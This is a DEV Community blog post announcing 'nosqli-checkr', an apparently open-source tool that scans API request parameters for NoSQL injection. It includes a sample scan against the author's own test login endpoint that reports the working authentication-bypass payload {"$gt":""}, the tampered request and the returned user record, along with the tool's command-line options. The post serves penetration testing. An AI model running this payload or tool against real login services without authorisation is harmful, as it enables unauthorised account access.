DEV Community

Igor Souza Martins
Igor Souza Martins

Posted on • Edited on

Making easier a NoSQLi pentest

#security #pentest #node

Hello, everyone!

Today I've created a project which automates a NoSQLi pentest, but this is the first version and I ask for help in this project.

If you have an interest in helping a little project to become a large project to make our life as "security guys" more easier, please, send issues or send a PR.

So, how this project works?

With some info from a request, the "exploit" can test if the request parameters can be exploited with some payloads of NoSQLi.

Example to exploit an login API, where we have a POST request and we have a JSON data with user and pass:

[igor.martins automated]$ nosqli-checkr scan --host="https://nosql-checkr-test.herokuapp.com/api/v1/login" --data='{ "user": "wubba", "pass": "" }' --method="post" --params="pass" --error-message='{"success":false,"result":"user/pass not found"}' ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██╗ ██╗ ██████╗ ██╗ ██╗ ███████╗ ██████╗ ██╗ ██╗ ██████╗ ████╗ ██║ ██╔═══██╗ ██╔════╝ ██╔═══██╗ ██║ ██║ ██╔════╝ ██║ ██║ ██╔════╝ ██╔════╝ ██║ ██╔╝ ██╔══██╗ ██╔██╗ ██║ ██║ ██║ ███████╗ ██║ ██║ ██║ ██║ ██║ ███████║ █████╗ ██║ █████╔╝ ██████╔╝ ██║╚██╗██║ ██║ ██║ ╚════██║ ██║▄▄ ██║ ██║ ██║ ██║ ██╔══██║ ██╔══╝ ██║ ██╔═██╗ ██╔══██╗ ██║ ╚████║ ╚██████╔╝ ███████║ ╚██████╔╝ ███████╗ ██║ ╚██████╗ ██║ ██║ ███████╗ ╚██████╗ ██║ ██╗ ██║ ██║ ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚══▀▀═╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ✔ Request finished ✔ Response analyzed ✔ https://nosql-checkr-test.herokuapp.com/api/v1/login is vulnerable ℹ Payload: {"$gt":""} ℹ Evil data 😈: {"user":"wubba","pass":{"$gt":""}} ℹ Data stoled: { "success": true, "result": { "user": "wubba", "_id": "hVFQzFwVlMwCYFBT" } }
Enter fullscreen mode Exit fullscreen mode

The "exploit" test the param pass and find a payload {"$gt":""} which can exploit the NoSQL Injection flaw.

Parameters

  • -h or --host: Route URL. Ex: https://nosql-checkr-test.herokuapp.com/api/v1/login
  • -hr or --headers: Request headers. Ex: token:val or token:val;token2:val2
  • -d or --data: Request data: Ex: { "user": "wubba", "pass": "" }
  • -m or --method: Request method: Ex: post or POST
  • -p or --params: Request params which will be exploited: Ex: pass or user,pass
  • -e or --error-message: The default error message of request. Ex: {"success":false,"result":"user/pass not found"}

Github Project

Github Project

Top comments (0)